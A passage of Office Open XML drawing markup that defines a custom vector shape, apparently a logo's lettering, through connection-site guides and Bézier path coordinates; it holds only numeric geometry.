                <a:gd name="connsiteX43" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY43" fmla="*/ 693107 h 941357"/>
                <a:gd name="connsiteX44" fmla="*/ 3563206 w 4182422"/>
                <a:gd name="connsiteY44" fmla="*/ 749825 h 941357"/>
                <a:gd name="connsiteX45" fmla="*/ 3393942 w 4182422"/>
                <a:gd name="connsiteY45" fmla="*/ 603815 h 941357"/>
                <a:gd name="connsiteX46" fmla="*/ 3452529 w 4182422"/>
                <a:gd name="connsiteY46" fmla="*/ 483862 h 941357"/>
                <a:gd name="connsiteX47" fmla="*/ 3587372 w 4182422"/>
                <a:gd name="connsiteY47" fmla="*/ 457833 h 941357"/>
                <a:gd name="connsiteX48" fmla="*/ 3649691 w 4182422"/>
                <a:gd name="connsiteY48" fmla="*/ 459686 h 941357"/>
                <a:gd name="connsiteX49" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY49" fmla="*/ 462463 h 941357"/>
                <a:gd name="connsiteX50" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY50" fmla="*/ 442018 h 941357"/>
                <a:gd name="connsiteX51" fmla="*/ 3690611 w 4182422"/>
                <a:gd name="connsiteY51" fmla="*/ 388076 h 941357"/>
                <a:gd name="connsiteX52" fmla="*/ 3612503 w 4182422"/>
                <a:gd name="connsiteY52" fmla="*/ 366677 h 941357"/>
                <a:gd name="connsiteX53" fmla="*/ 3590190 w 4182422"/>
                <a:gd name="connsiteY53" fmla="*/ 367618 h 941357"/>
                <a:gd name="connsiteX54" fmla="*/ 3539954 w 4182422"/>
                <a:gd name="connsiteY54" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX55" fmla="*/ 3430216 w 4182422"/>
                <a:gd name="connsiteY55" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX56" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY56" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX57" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY57" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX58" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY58" fmla="*/ 331283 h 941357"/>
                <a:gd name="connsiteX59" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY59" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX60" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY60" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX61" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY61" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX62" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY62" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX63" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY63" fmla="*/ 692121 h 941357"/>
                <a:gd name="connsiteX64" fmla="*/ 2616030 w 4182422"/>
                <a:gd name="connsiteY64" fmla="*/ 866968 h 941357"/>
                <a:gd name="connsiteX65" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY65" fmla="*/ 941357 h 941357"/>
                <a:gd name="connsiteX66" fmla="*/ 2226352 w 4182422"/>
                <a:gd name="connsiteY66" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX67" fmla="*/ 2336114 w 4182422"/>
                <a:gd name="connsiteY67" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX68" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY68" fmla="*/ 844657 h 941357"/>
                <a:gd name="connsiteX69" fmla="*/ 2522107 w 4182422"/>
                <a:gd name="connsiteY69" fmla="*/ 797229 h 941357"/>
                <a:gd name="connsiteX70" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY70" fmla="*/ 705141 h 941357"/>
                <a:gd name="connsiteX71" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY71" fmla="*/ 688403 h 941357"/>
                <a:gd name="connsiteX72" fmla="*/ 2401201 w 4182422"/>
                <a:gd name="connsiteY72" fmla="*/ 737714 h 941357"/>
                <a:gd name="connsiteX73" fmla="*/ 2191955 w 4182422"/>
                <a:gd name="connsiteY73" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX74" fmla="*/ 2204978 w 4182422"/>
                <a:gd name="connsiteY74" fmla="*/ 416857 h 941357"/>
                <a:gd name="connsiteX75" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY75" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX76" fmla="*/ 338260 w 4182422"/>
                <a:gd name="connsiteY76" fmla="*/ 189573 h 941357"/>
                <a:gd name="connsiteX77" fmla="*/ 245317 w 4182422"/>
                <a:gd name="connsiteY77" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX78" fmla="*/ 431200 w 4182422"/>
                <a:gd name="connsiteY78" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX79" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY79" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX80" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY80" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX81" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY81" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX82" fmla="*/ 1715247 w 4182422"/>
                <a:gd name="connsiteY82" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX83" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY83" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX84" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY84" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX85" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY85" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX86" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY86" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX87" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY87" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX88" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY88" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX89" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY89" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX90" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY90" fmla="*/ 558285 h 941357"/>
                <a:gd name="connsiteX91" fmla="*/ 3285320 w 4182422"/>
                <a:gd name="connsiteY91" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX92" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY92" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX93" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY93" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX94" fmla="*/ 3284381 w 4182422"/>
                <a:gd name="connsiteY94" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX95" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY95" fmla="*/ 580595 h 941357"/>
                <a:gd name="connsiteX96" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY96" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX97" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY97" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX98" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY98" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX99" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY99" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX100" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY100" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX101" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY101" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX102" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY102" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX103" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY103" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX104" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY104" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX105" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY105" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX106" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY106" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX107" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY107" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX108" fmla="*/ 275065 w 4182422"/>
                <a:gd name="connsiteY108" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX109" fmla="*/ 401442 w 4182422"/>
                <a:gd name="connsiteY109" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX110" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY110" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX111" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY111" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX112" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY112" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX113" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY113" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX114" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY114" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX115" fmla="*/ 501792 w 4182422"/>
                <a:gd name="connsiteY115" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX116" fmla="*/ 468335 w 4182422"/>
                <a:gd name="connsiteY116" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX117" fmla="*/ 209085 w 4182422"/>
                <a:gd name="connsiteY117" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX118" fmla="*/ 175639 w 4182422"/>
                <a:gd name="connsiteY118" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX119" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY119" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX120" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY120" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX121" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY121" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX122" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY122" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX123" fmla="*/ 52059 w 4182422"/>
                <a:gd name="connsiteY123" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX124" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY124" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX125" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY125" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX126" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY126" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX127" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY127" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX128" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY128" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX129" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY129" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX130" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY130" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX131" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY131" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX132" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY132" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX133" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY133" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX134" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY134" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX135" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY135" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX136" fmla="*/ 1736636 w 4182422"/>
                <a:gd name="connsiteY136" fmla="*/ 147236 h 941357"/>
                <a:gd name="connsiteX137" fmla="*/ 1839860 w 4182422"/>
                <a:gd name="connsiteY137" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX138" fmla="*/ 1831511 w 4182422"/>
                <a:gd name="connsiteY138" fmla="*/ 489482 h 941357"/>
                <a:gd name="connsiteX139" fmla="*/ 1686412 w 4182422"/>
                <a:gd name="connsiteY139" fmla="*/ 692212 h 941357"/>
                <a:gd name="connsiteX140" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY140" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX141" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY141" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX142" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY142" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX143" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY143" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX144" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY144" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX145" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY145" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX146" fmla="*/ 750838 w 4182422"/>
                <a:gd name="connsiteY146" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX147" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY147" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX148" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY148" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX149" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY149" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX150" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY150" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX151" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY151" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX152" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY152" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX153" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY153" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX154" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY154" fmla="*/ 99437 h 941357"/>
                <a:gd name="connsiteX155" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY155" fmla="*/ 140311 h 941357"/>
                <a:gd name="connsiteX156" fmla="*/ 597510 w 4182422"/>
                <a:gd name="connsiteY156" fmla="*/ 66914 h 94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182422" h="941357">
                  <a:moveTo>
                    <a:pt x="3600394" y="545242"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3534369" y="545242"/>
                    <a:pt x="3512056" y="559193"/>
                    <a:pt x="3512056" y="599184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3512056" y="607533"/>
                    <a:pt x="3513935" y="615910"/>
                    <a:pt x="3516701" y="622437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3525078" y="643806"/>
                    <a:pt x="3544625" y="651261"/>
                    <a:pt x="3588311" y="651261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3634816" y="651261"/>
                    <a:pt x="3666445" y="641940"/>
                    <a:pt x="3687819" y="623348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3701781" y="611250"/>
                    <a:pt x="3705512" y="601959"/>
                    <a:pt x="3705512" y="574988"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3705512" y="549872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3675736" y="547095"/>
                    <a:pt x="3629231" y="545242"/>
                    <a:pt x="3600394" y="545242"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2419807" y="371294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2405871" y="371294"/>
                    <a:pt x="2391910" y="374071"/>
                    <a:pt x="2380740" y="378729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2336114" y="397323"/>
                    <a:pt x="2311948" y="443828"/>
                    <a:pt x="2311948" y="507071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2311948" y="525663"/>
                    <a:pt x="2314715" y="544255"/>
                    <a:pt x="2319386" y="560072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2332383" y="606576"/>
                    <a:pt x="2371450" y="635403"/>
                    <a:pt x="2421660" y="635403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2490503" y="635403"/>
                    <a:pt x="2536069" y="585180"/>
                    <a:pt x="2536069" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2536069" y="425236"/>
                    <a:pt x="2490503" y="371294"/>
                    <a:pt x="2419807" y="371294"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2771158" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2771158" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1904769" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1904769" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3615295" y="270888"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3639461" y="270888"/>
                    <a:pt x="3663653" y="272754"/>
                    <a:pt x="3685026" y="275531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3748260" y="284849"/>
                    <a:pt x="3789179" y="311820"/>
                    <a:pt x="3807787" y="357386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3818956" y="383415"/>
                    <a:pt x="3822687" y="412239"/>
                    <a:pt x="3822687" y="468045"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3822687" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="693107"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3676675" y="732155"/>
                    <a:pt x="3630170" y="749825"/>
                    <a:pt x="3563206" y="749825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3454382" y="749825"/>
                    <a:pt x="3393942" y="697747"/>
                    <a:pt x="3393942" y="603815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3393942" y="549872"/>
                    <a:pt x="3414402" y="508970"/>
                    <a:pt x="3452529" y="483862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3479488" y="467124"/>
                    <a:pt x="3525078" y="457833"/>
                    <a:pt x="3587372" y="457833"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3649691" y="459686"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3657129" y="459686"/>
                    <a:pt x="3686880" y="461552"/>
                    <a:pt x="3702694" y="462463"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3702694" y="442018"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3702694" y="409462"/>
                    <a:pt x="3699927" y="399230"/>
                    <a:pt x="3690611" y="388076"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3677589" y="374114"/>
                    <a:pt x="3651570" y="366677"/>
                    <a:pt x="3612503" y="366677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3605065" y="366677"/>
                    <a:pt x="3597628" y="366677"/>
                    <a:pt x="3590190" y="367618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3554829" y="372259"/>
                    <a:pt x="3543685" y="383415"/>
                    <a:pt x="3539954" y="420619"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3430216" y="420619"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3433922" y="312734"/>
                    <a:pt x="3485098" y="270888"/>
                    <a:pt x="3615295" y="270888"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2404018" y="269903"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2464433" y="269903"/>
                    <a:pt x="2504439" y="286662"/>
                    <a:pt x="2547213" y="331283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2547213" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="692121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2654158" y="785132"/>
                    <a:pt x="2644867" y="826977"/>
                    <a:pt x="2616030" y="866968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2578842" y="918134"/>
                    <a:pt x="2518376" y="941357"/>
                    <a:pt x="2423513" y="941357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2284025" y="941357"/>
                    <a:pt x="2230083" y="899512"/>
                    <a:pt x="2226352" y="789773"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2336114" y="789773"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2342638" y="831637"/>
                    <a:pt x="2363987" y="844657"/>
                    <a:pt x="2423513" y="844657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2476542" y="844657"/>
                    <a:pt x="2505379" y="830695"/>
                    <a:pt x="2522107" y="797229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2533251" y="774899"/>
                    <a:pt x="2536069" y="754443"/>
                    <a:pt x="2536069" y="705141"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2536069" y="688403"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2492356" y="724675"/>
                    <a:pt x="2456057" y="737714"/>
                    <a:pt x="2401201" y="737714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2275648" y="737714"/>
                    <a:pt x="2191955" y="646557"/>
                    <a:pt x="2191955" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2191955" y="476381"/>
                    <a:pt x="2196626" y="445691"/>
                    <a:pt x="2204978" y="416857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2231936" y="325711"/>
                    <a:pt x="2307278" y="269903"/>
                    <a:pt x="2404018" y="269903"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="338260" y="189573"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="245317" y="446957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431200" y="446957"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1408353" y="168636"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1408353" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469732" y="635494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1624121" y="635494"/>
                    <a:pt x="1715247" y="549006"/>
                    <a:pt x="1715247" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1715247" y="256063"/>
                    <a:pt x="1624121" y="168636"/>
                    <a:pt x="1469732" y="168636"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3116056" y="135153"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="135153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="558285"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3233231" y="619662"/>
                    <a:pt x="3243486" y="634537"/>
                    <a:pt x="3285320" y="635479"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="635479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="736848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3284381" y="736848"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3167206" y="736848"/>
                    <a:pt x="3116056" y="690343"/>
                    <a:pt x="3116056" y="580595"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="283019"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2833452" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833452" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1967060" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967060" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275065" y="67826"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="401442" y="67826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501792" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468335" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
